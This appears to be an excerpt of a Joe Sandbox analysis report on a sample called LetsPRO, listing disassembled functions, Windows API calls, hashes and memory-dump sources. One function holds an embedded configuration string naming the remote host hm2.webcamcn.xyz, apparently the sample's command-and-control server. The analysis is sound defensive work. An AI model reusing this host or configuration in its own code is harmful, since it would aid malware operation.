                                          • Part of subcall function 03F43CA0: TlsSetValue.KERNEL32(00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000,?,03F43F06), ref: 03F43CCA
                                        • ___fls_getvalue@4.LIBCMT ref: 03F3F9D5
                                          • Part of subcall function 03F43C80: TlsGetValue.KERNEL32(?,?,03F3F9DA,00000000), ref: 03F43C8E
                                        • ___fls_setvalue@8.LIBCMT ref: 03F3F9E8
                                          • Part of subcall function 03F43CD4: DecodePointer.KERNEL32(?,?,?,03F3F9ED,00000000,?,00000000), ref: 03F43CE5
                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 03F3F9F1
                                        • ExitThread.KERNEL32 ref: 03F3F9F8
                                        • GetCurrentThreadId.KERNEL32 ref: 03F3F9FE
                                        • __freefls@4.LIBCMT ref: 03F3FA1E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                        • String ID:
                                        • API String ID: 2383549826-0
                                        • Opcode ID: ee074954e6ccf081f85a116bd43d186e8bedc46bd2df3b96cd20d4a4df05fa0f
                                        • Instruction ID: fd8f02e33d2d9315c44a36d55b1fb1f1f75679a28bf1aa73516dcf7738ed917e
                                        • Opcode Fuzzy Hash: ee074954e6ccf081f85a116bd43d186e8bedc46bd2df3b96cd20d4a4df05fa0f
                                        • Instruction Fuzzy Hash: 40F0177CA01345BBCB08FF71DE4880E7FE9AF892557258959EA098B215DB34D842CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F32D0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025F32E1
                                        • Sleep.KERNEL32(00000258), ref: 025F32EE
                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 025F32F6
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025F3302
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025F330A
                                        • Sleep.KERNEL32(0000012C), ref: 025F331B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                        • String ID:
                                        • API String ID: 3137405945-0
                                        • Opcode ID: c68825feaf78103496a7bd7bb812ca9eca9f5f4167cb3147be24a44d9946ede3
                                        • Instruction ID: 451caeb7e5b343b84fa6a75f67b6d8b2923381dd809f2baeb5f5351507feb7cd
                                        • Opcode Fuzzy Hash: c68825feaf78103496a7bd7bb812ca9eca9f5f4167cb3147be24a44d9946ede3
                                        • Instruction Fuzzy Hash: 3FF082722443046BD710ABA9DCC4E4FF3ACBF85330B204B09F222972D4CAB0E8418BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F36690 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 03F3669B
                                        • CoCreateInstance.OLE32(03F546FC,00000000,00000001,03F5471C,?,?,?,?,?,?,?,?,?,?,03F3588A), ref: 03F366B2
                                        • SysFreeString.OLEAUT32(?), ref: 03F3674C
                                        • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,03F3588A), ref: 03F3677D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateFreeInitializeInstanceStringUninitialize
                                        • String ID: FriendlyName
                                        • API String ID: 841178590-3623505368
                                        • Opcode ID: d96724143746f7f2285724991f0800bb91be446347adcaa71d080dbcfde43789
                                        • Instruction ID: bbe5ff15bcdf224baf48aacb8db022ab9ffe81a14ee0d7ac4af5f4c5a5002a2c
                                        • Opcode Fuzzy Hash: d96724143746f7f2285724991f0800bb91be446347adcaa71d080dbcfde43789
                                        • Instruction Fuzzy Hash: 0B314F75B0020ABFDB00DB99DC80EAEB7B9EF89704F148594FA05EB254DA71E941CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F6FF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • _malloc.LIBCMT ref: 025F7011
                                          • Part of subcall function 025F6F63: __FF_MSGBANNER.LIBCMT ref: 025F6F7C
                                          • Part of subcall function 025F6F63: __NMSG_WRITE.LIBCMT ref: 025F6F83
                                          • Part of subcall function 025F6F63: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 025F6FA8
                                        • std::exception::exception.LIBCMT ref: 025F7046
                                        • std::exception::exception.LIBCMT ref: 025F7060
                                        • __CxxThrowException@8.LIBCMT ref: 025F7071
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                        • String ID: bad allocation
                                        • API String ID: 615853336-2104205924
                                        • Opcode ID: 1dbb6c74b729fbc648b1ba8d6f260ffc454b303df7ee5541645e72d97d64e89d
                                        • Instruction ID: 56f0b4a47071dd1eb423d76a68faf7082c4709bf3bb3825d5ba5eb9d17137804
                                        • Opcode Fuzzy Hash: 1dbb6c74b729fbc648b1ba8d6f260ffc454b303df7ee5541645e72d97d64e89d
                                        • Instruction Fuzzy Hash: 11F0F93190020AAADB84EF90D98496FBF6FBF88754F100414D711D61C0DBB08A809F8D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3F707 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • _malloc.LIBCMT ref: 03F3F721
                                          • Part of subcall function 03F3F673: __FF_MSGBANNER.LIBCMT ref: 03F3F68C
                                          • Part of subcall function 03F3F673: __NMSG_WRITE.LIBCMT ref: 03F3F693
                                          • Part of subcall function 03F3F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76), ref: 03F3F6B8
                                        • std::exception::exception.LIBCMT ref: 03F3F756
                                        • std::exception::exception.LIBCMT ref: 03F3F770
                                        • __CxxThrowException@8.LIBCMT ref: 03F3F781
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                        • String ID: bad allocation
                                        • API String ID: 615853336-2104205924
                                        • Opcode ID: dd4ff3f9fb415196659bc15a766e7e17d10f3878ebdf3c425a082c547788615f
                                        • Instruction ID: 42cb8b4e3da72cb74d6abe40266abfb2c59fb75dd60a9aa4aac712382126588a
                                        • Opcode Fuzzy Hash: dd4ff3f9fb415196659bc15a766e7e17d10f3878ebdf3c425a082c547788615f
                                        • Instruction Fuzzy Hash: C5F0C275D0030FFFDB04FB54EC35A9E7BA9AB42654F180099EE10EA291DB70DA45CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F2D00 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                        Download Yara Rule
                                        APIs
                                        • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 025F2D2C
                                        • CancelIo.KERNEL32(?), ref: 025F2D36
                                        • InterlockedExchange.KERNEL32(00000000,00000000), ref: 025F2D3F
                                        • closesocket.WS2_32(?), ref: 025F2D49
                                        • SetEvent.KERNEL32(00000001), ref: 025F2D53
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                        • String ID:
                                        • API String ID: 1486965892-0
                                        • Opcode ID: 0fc9490d50b7bb836e4b737794c54e72b93d17d536af6736232a099479e4fb03
                                        • Instruction ID: df079b589c12191e69521d6b1e77a144bd8769183eb90b34bfe3941e88ddcba2
                                        • Opcode Fuzzy Hash: 0fc9490d50b7bb836e4b737794c54e72b93d17d536af6736232a099479e4fb03
                                        • Instruction Fuzzy Hash: 70F0AF76540300ABD3308F54DC88F5F77B8FB48B11F504A49F68393684C7B0B8849BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F32D30 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                        Download Yara Rule
                                        APIs
                                        • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03F32D5C
                                        • CancelIo.KERNEL32(?), ref: 03F32D66
                                        • InterlockedExchange.KERNEL32(00000000,00000000), ref: 03F32D6F
                                        • closesocket.WS2_32(?), ref: 03F32D79
                                        • SetEvent.KERNEL32(00000001), ref: 03F32D83
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                        • String ID:
                                        • API String ID: 1486965892-0
                                        • Opcode ID: 3e35fe3750f6aedf79811f71efea32352a7b4b413582f39341f7e564634f7da9
                                        • Instruction ID: f010ce8593ed04840212ae38a7f569a01d988bed1d3dd16ea1df3aacf04c3732
                                        • Opcode Fuzzy Hash: 3e35fe3750f6aedf79811f71efea32352a7b4b413582f39341f7e564634f7da9
                                        • Instruction Fuzzy Hash: 6AF03C76100708BBD224AF54ED49B6777B8BB49B11F100B1CF79296684C6B0B5048BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F6380 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28stringsynchronizationthreadCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:,?,025F7869,?,?,?,?,?,?,02607B00,0000000C,025F7911,?), ref: 025F6396
                                          • Part of subcall function 025F5E30: _memset.LIBCMT ref: 025F5E61
                                        • CreateThread.KERNEL32(00000000,00000000,025F6110,00000000,00000000,00000000), ref: 025F63BE
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,025F7869,?,?,?,?,?,?,02607B00,0000000C,025F7911,?), ref: 025F63CC
                                        Strings
                                        • |p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:, xrefs: 025F6391
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateObjectSingleThreadWait_memsetlstrlen
                                        • String ID: |p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:
                                        • API String ID: 2656291350-929315725
                                        • Opcode ID: d00e753a22e8792cd1f8d9a3759a41041e7e93f59bc3d8b80c94086ae60e50a9
                                        • Instruction ID: f3c43381f7842cbf825a716c17f11a2ee403a0cde6f382263bffa689a9067d0f
                                        • Opcode Fuzzy Hash: d00e753a22e8792cd1f8d9a3759a41041e7e93f59bc3d8b80c94086ae60e50a9
                                        • Instruction Fuzzy Hash: 68F0C0309D5318A6EB605694AD89F1E3B58B700B11F905A15F326DA1C8DBE064A0AA59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401E90 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000020,00000000,?,00401034,00000001,00403200,00000000,80000004,?,00401B47), ref: 00401EA5
                                        • GetFileSize.KERNEL32(00000000,00000001,?,00000268,?,00401034,00000001,00403200,00000000,80000004,?,00401B47), ref: 00401EBC
                                          • Part of subcall function 00401D70: GetProcessHeap.KERNEL32(00401ECD,00000008,?,00000268,?,00401034,00000001,00403200,00000000,80000004,?,00401B47), ref: 00401D79
                                          • Part of subcall function 00401D70: RtlAllocateHeap.NTDLL(?,00000000,80000004,?,00401ECD,00000008,?,00000268,?,00401034,00000001,00403200,00000000,80000004,?,00401B47), ref: 00401D8D
                                          • Part of subcall function 00401D70: MessageBoxA.USER32(00000000,004034C4,00403454,00000010), ref: 00401DA6
                                        • ReadFile.KERNEL32(00000000,00000008,00000000,?,00000000,80000004,?,00401B47), ref: 00401EE8
                                        • FindCloseChangeNotification.KERNEL32(00000000,?,00401B47), ref: 00401EEF
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: File$Heap$AllocateChangeCloseCreateFindMessageNotificationProcessReadSize
                                        • String ID:
                                        • API String ID: 4143106703-0
                                        • Opcode ID: 96e6af13bb3632e4f65ea48505cfcf65e0ca9eae43af927b16622970ce70d263
                                        • Instruction ID: 068492c836b03921794f879238fff4ce4ee63a2289c2f44e48a4c8b22c3a3183
                                        • Opcode Fuzzy Hash: 96e6af13bb3632e4f65ea48505cfcf65e0ca9eae43af927b16622970ce70d263
                                        • Instruction Fuzzy Hash: 7AF0C8B62003007BE3218F64ED8DF9B77ACEB88B10F104A2EF702B61D1E6B0A504C765
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F3130 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 025F313B
                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 025F3153
                                        • GetCurrentThreadId.KERNEL32 ref: 025F31FF
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentThread$ExchangeInterlocked
                                        • String ID:
                                        • API String ID: 4033114805-0
                                        • Opcode ID: 35b7a462200903f054298efb114332f725f4993c3ad4fd8c3404a264a4146ff8
                                        • Instruction ID: aff124b9a0e5459a13cea91d40469cf44ce1ec04a1b9311303a87b9624153e0a
                                        • Opcode Fuzzy Hash: 35b7a462200903f054298efb114332f725f4993c3ad4fd8c3404a264a4146ff8
                                        • Instruction Fuzzy Hash: E5316970200642EFE754DF69C884E6AB7E5FF44704B10C96DEA1ACB615E732F881CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F33160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 03F3316B
                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 03F33183
                                        • GetCurrentThreadId.KERNEL32 ref: 03F3322F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentThread$ExchangeInterlocked
                                        • String ID:
                                        • API String ID: 4033114805-0
                                        • Opcode ID: 24a3f9e6457030eb4ad2623116cad00c72fb8c0dba17f1c13343bb858f2465e4
                                        • Instruction ID: fd5e875e7e243ddf2ea167a6b83271aa7a9a37f3aa13dfd441fff6083c2d3629
                                        • Opcode Fuzzy Hash: 24a3f9e6457030eb4ad2623116cad00c72fb8c0dba17f1c13343bb858f2465e4
                                        • Instruction Fuzzy Hash: 9831BA79600706AFCB28EF29C880A66B3E8FF45304B14C62EE91ACB615D731F841CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F11B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __floor_pentium4.LIBCMT ref: 025F11E9
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 025F1226
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 025F1255
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Virtual$AllocFree__floor_pentium4
                                        • String ID:
                                        • API String ID: 2605973128-0
                                        • Opcode ID: 0e3071ce47c0d4aab2f2e32319285ae929969064a2972ada7452d97213ab0ed5
                                        • Instruction ID: 93206b16a79f2b485c59e2d7ee47444d8593d285ecb6c8126612f946bb1fdbd8
                                        • Opcode Fuzzy Hash: 0e3071ce47c0d4aab2f2e32319285ae929969064a2972ada7452d97213ab0ed5
                                        • Instruction Fuzzy Hash: 7121C230E407099BDB509FAAD985B6FFBF4FF40705F10C96DE94AE2640E630A8508B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F311B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __floor_pentium4.LIBCMT ref: 03F311E9
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03F31226
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03F31255
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Virtual$AllocFree__floor_pentium4
                                        • String ID:
                                        • API String ID: 2605973128-0
                                        • Opcode ID: 9c4283acd9f34a8f29a1324bc380c8ae99be4d99c18f9b89bb4d72692985c9d9
                                        • Instruction ID: f884a2be822a821cc3c2ae3a4188ad8123c8fdde216f676e2adc5bdc7294e16d
                                        • Opcode Fuzzy Hash: 9c4283acd9f34a8f29a1324bc380c8ae99be4d99c18f9b89bb4d72692985c9d9
                                        • Instruction Fuzzy Hash: 3521A171E00709AFDB10EFADD845B6FFBF8EF41B05F0089ADE959E2640E630A8108750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F1100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __floor_pentium4.LIBCMT ref: 025F112F
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 025F115F
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 025F1192
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Virtual$AllocFree__floor_pentium4
                                        • String ID:
                                        • API String ID: 2605973128-0
                                        • Opcode ID: b61221a253da1cb27c0d1b9d602614972c51eca46f46f8b6627c6441c77bf1e6
                                        • Instruction ID: 99fe15ca16d3dfee85f2a78a5fa60446793554b17502f4c85754e782b2d37eb4
                                        • Opcode Fuzzy Hash: b61221a253da1cb27c0d1b9d602614972c51eca46f46f8b6627c6441c77bf1e6
                                        • Instruction Fuzzy Hash: E7118470E40709ABDB509FA9D985B6FFBF8FF04705F108869EA5AE2240E670A8508B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F31100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __floor_pentium4.LIBCMT ref: 03F3112F
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03F3115F
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03F31192
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Virtual$AllocFree__floor_pentium4
                                        • String ID:
                                        • API String ID: 2605973128-0
                                        • Opcode ID: abe0099f494feef5fc5ec8df4aa2a5b51072d4ebe4146525f14f7d5b74dbabb8
                                        • Instruction ID: d9a611e4aa0c603143ecb0fe4fb092600494f0f3d6b450e1d880103d6cc46153
                                        • Opcode Fuzzy Hash: abe0099f494feef5fc5ec8df4aa2a5b51072d4ebe4146525f14f7d5b74dbabb8
                                        • Instruction Fuzzy Hash: D8119371E00709AFEB10AFA9DC85B6EFBF8EF05705F0085A9E959E2240E670A9148751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F39DE0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03F39E04
                                        • GdipDisposeImage.GDIPLUS(?), ref: 03F39E18
                                        • GdipDisposeImage.GDIPLUS(?), ref: 03F39E3B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                        • String ID:
                                        • API String ID: 800915452-0
                                        • Opcode ID: 4a3b0dda992301d33d133e1244de2ac9b098d2bc5278faa3bb322e4e7e32b91b
                                        • Instruction ID: 5f6a4ae146f7d891a3b3ab198d162e0a256dd5d303ae191f30c0df9d4fe038ea
                                        • Opcode Fuzzy Hash: 4a3b0dda992301d33d133e1244de2ac9b098d2bc5278faa3bb322e4e7e32b91b
                                        • Instruction Fuzzy Hash: 29F0AF72D0122DAB8B10EF98D8448AFF7B8EF49611B00865AFD05BB340D7B49B05CBE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F39AC0 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnterCriticalSection.KERNEL32(03F5FB64), ref: 03F39ADC
                                        • GdiplusStartup.GDIPLUS(03F5FB60,?,?), ref: 03F39B15
                                        • LeaveCriticalSection.KERNEL32(03F5FB64), ref: 03F39B26
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                        • String ID:
                                        • API String ID: 389129658-0
                                        • Opcode ID: d4917b6abbed2d6f0c730a43428fd482f74901fddfe4bf4fa6d5ebc4805cb7be
                                        • Instruction ID: 443947fdebd3b8124149abe01b1b5f13a8dabaa8cb31730a325af9ed4ee4668f
                                        • Opcode Fuzzy Hash: d4917b6abbed2d6f0c730a43428fd482f74901fddfe4bf4fa6d5ebc4805cb7be
                                        • Instruction Fuzzy Hash: BEF0497594130EEFDB00EE95E87A7ABB7A8E705305F4002D9EA0452241D7B28148CAA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401D70 Relevance: 4.5, APIs: 3, Instructions: 25memorywindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00401ECD,00000008,?,00000268,?,00401034,00000001,00403200,00000000,80000004,?,00401B47), ref: 00401D79
                                        • RtlAllocateHeap.NTDLL(?,00000000,80000004,?,00401ECD,00000008,?,00000268,?,00401034,00000001,00403200,00000000,80000004,?,00401B47), ref: 00401D8D
                                        • MessageBoxA.USER32(00000000,004034C4,00403454,00000010), ref: 00401DA6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Heap$AllocateMessageProcess
                                        • String ID:
                                        • API String ID: 2992861138-0
                                        • Opcode ID: 7e9d95e45dc223e7848f09b81f06415e65863eddbb43bbbc891e6ffd1e7de991
                                        • Instruction ID: 4e26ca8178db8fc30090980ebf34677fd27361643c1047b7d41dcf3c77c33c4e
                                        • Opcode Fuzzy Hash: 7e9d95e45dc223e7848f09b81f06415e65863eddbb43bbbc891e6ffd1e7de991
                                        • Instruction Fuzzy Hash: F3E09271A403116BE6125B61AE4EF473A5CAB04B46F010035FA01FA3D1D6B4ED00865C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F7255 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 025F7261
                                          • Part of subcall function 025F997B: __getptd_noexit.LIBCMT ref: 025F997E
                                          • Part of subcall function 025F997B: __amsg_exit.LIBCMT ref: 025F998B
                                        • __endthreadex.LIBCMT ref: 025F7271
                                          • Part of subcall function 025F7236: __getptd_noexit.LIBCMT ref: 025F723B
                                          • Part of subcall function 025F7236: __freeptd.LIBCMT ref: 025F7245
                                          • Part of subcall function 025F7236: RtlExitUserThread.NTDLL(?,?,025F7276,00000000), ref: 025F724E
                                          • Part of subcall function 025F7236: __XcptFilter.LIBCMT ref: 025F7282
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
